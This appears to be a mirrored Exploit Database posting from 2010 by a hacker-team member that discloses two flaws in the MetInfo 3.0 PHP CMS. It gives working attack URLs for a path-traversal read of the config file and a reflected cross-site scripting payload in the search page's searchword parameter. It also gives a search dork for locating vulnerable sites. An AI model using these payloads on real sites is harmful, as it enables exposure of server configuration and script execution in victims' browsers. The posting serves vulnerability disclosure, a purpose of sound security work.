Metinfo 3.0 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： anT!-Tr0J4n
  日期： 2010-11-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15496/

• # Exploit Title: metinfo3.0 Mullti Vulnerability
  
  # Date : 10-11-2010
  
  # Author :anT!-Tr0J4n
  
  # Version : 3.0
  
  #DorK :Powered by MetInfo 3.0 
   
  # Home:www.Dev-PoinT.com : http://milw0rm.ws
  
  #Email :D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
  
  Vendor£ : http://www.metinfo.cn/
  
  #Greetz: Dev-PoinT.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l
  
  #special thanks to milw0rm.ws team : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu
  
  
  ========================================================
  metinfo3.0 source code disclosure Vulnerability 
  ========================================================
  
  [>] exploit ->
  
  [+] http://localhost/metinfo/templates/met001/../../ [file disclosure]
  
  EX :
  
  [+] http://localhost/metinfo/templates/met001/../../config
  
  
  ======================================================
  [>] metinfo3.0 XSS Vulnerability
  ======================================================
  
  [>] exploit -> XSS Vulnerability
  
  
  http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]
  
  
  http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script>
  
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  
  [+] Site : Inj3ct0r.com
  [+] Support e-mail: submit[at]inj3ct0r.com
  [+] I'm anT!-Tr0J4n member from Inj3ct0r Team